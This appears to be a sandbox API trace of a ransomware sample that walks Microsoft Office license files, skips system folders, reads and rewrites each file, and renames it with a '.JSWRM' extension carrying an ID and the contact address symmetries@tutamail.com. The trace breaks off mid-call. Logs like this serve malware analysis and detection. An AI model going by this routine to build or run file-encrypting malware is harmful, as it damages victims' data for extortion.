1 [0107.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0107.148] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalPipcR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalpipcr_grace-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.149] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11644) returned 1 [0107.149] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d70) returned 0x24c1d0 [0107.149] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d70, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d70, lpOverlapped=0x0) returned 1 [0107.151] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.151] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d70, lpOverlapped=0x0) returned 1 [0107.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.151] CloseHandle (hObject=0x45c) returned 1 [0107.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0107.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0107.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0107.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0107.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0107.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0107.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ecb8 [0107.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0107.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.152] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalPipcR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalpipcr_grace-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalPipcR_Grace-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalpipcr_grace-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0107.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0107.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0107.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.153] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe88223de, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe88223de, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe88bad46, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x29b7, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProfessionalPipcR_OEM_Perp-pl.xrm-ms", cAlternateFileName="PROFES~1.XRM")) returned 1 [0107.153] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-pl.xrm-ms", lpString2=".") returned 1 [0107.153] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-pl.xrm-ms", lpString2="..") returned 1 [0107.153] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-pl.xrm-ms", lpString2="...") returned 1 [0107.153] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-pl.xrm-ms", lpString2="windows") returned -1 [0107.153] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-pl.xrm-ms", lpString2="recovery") returned -1 [0107.153] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-pl.xrm-ms", lpString2="perflogs") returned 1 [0107.153] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-pl.xrm-ms", lpString2="documents and settings") returned 1 [0107.153] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.153] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-pl.xrm-ms", lpString2="system volume information") returned -1 [0107.153] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-pl.xrm-ms", lpString2="msocache") returned 1 [0107.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0107.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalPipcR_OEM_Perp-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0107.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalPipcR_OEM_Perp-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalPipcR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0107.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0107.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0107.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalPipcR_OEM_Perp-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0107.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalPipcR_OEM_Perp-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalPipcR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0107.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0107.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0107.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0107.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0107.153] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalPipcR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalpipcr_oem_perp-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.154] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10679) returned 1 [0107.154] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x29b0) returned 0x24c1d0 [0107.154] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x29b0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x29b0, lpOverlapped=0x0) returned 1 [0107.172] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.172] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x29b0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x29b0, lpOverlapped=0x0) returned 1 [0107.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.172] CloseHandle (hObject=0x45c) returned 1 [0107.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0107.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0107.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0107.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0107.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0107.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0107.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b448 [0107.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f970 [0107.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0107.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0107.172] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalPipcR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalpipcr_oem_perp-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalPipcR_OEM_Perp-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalpipcr_oem_perp-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0107.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0107.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0107.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.174] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8b697bd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8b697bd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8c28391, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x59b1, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProfessionalPipcR_OEM_Perp-ppd.xrm-ms", cAlternateFileName="PR5451~1.XRM")) returned 1 [0107.174] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-ppd.xrm-ms", lpString2=".") returned 1 [0107.174] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-ppd.xrm-ms", lpString2="..") returned 1 [0107.174] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-ppd.xrm-ms", lpString2="...") returned 1 [0107.174] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-ppd.xrm-ms", lpString2="windows") returned -1 [0107.174] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-ppd.xrm-ms", lpString2="recovery") returned -1 [0107.174] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-ppd.xrm-ms", lpString2="perflogs") returned 1 [0107.174] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0107.174] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.174] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-ppd.xrm-ms", lpString2="system volume information") returned -1 [0107.175] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-ppd.xrm-ms", lpString2="msocache") returned 1 [0107.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0107.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalPipcR_OEM_Perp-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0107.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalPipcR_OEM_Perp-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalPipcR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0107.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0107.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0107.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalPipcR_OEM_Perp-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0107.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0107.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalPipcR_OEM_Perp-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d298, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalPipcR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0107.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0107.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0107.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0107.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0107.175] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalPipcR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalpipcr_oem_perp-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.175] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=22961) returned 1 [0107.176] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x59b0) returned 0x24c1d0 [0107.176] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x59b0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x59b0, lpOverlapped=0x0) returned 1 [0107.381] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.381] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x59b0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x59b0, lpOverlapped=0x0) returned 1 [0107.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.382] CloseHandle (hObject=0x45c) returned 1 [0107.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0107.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0107.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0107.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b380 [0107.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f970 [0107.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b380 | out: hHeap=0x1e0000) returned 1 [0107.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.382] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalPipcR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalpipcr_oem_perp-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalPipcR_OEM_Perp-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalpipcr_oem_perp-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0107.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0107.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0107.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0107.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.384] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8b43559, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8b43559, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8c02138, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d75, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProfessionalPipcR_OEM_Perp-ul-oob.xrm-ms", cAlternateFileName="PR6A55~1.XRM")) returned 1 [0107.385] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-ul-oob.xrm-ms", lpString2=".") returned 1 [0107.385] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-ul-oob.xrm-ms", lpString2="..") returned 1 [0107.385] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-ul-oob.xrm-ms", lpString2="...") returned 1 [0107.385] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-ul-oob.xrm-ms", lpString2="windows") returned -1 [0107.385] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0107.385] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0107.385] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0107.385] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.385] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0107.385] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0107.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0107.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalPipcR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0107.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalPipcR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x22d260, cbMultiByte=40, 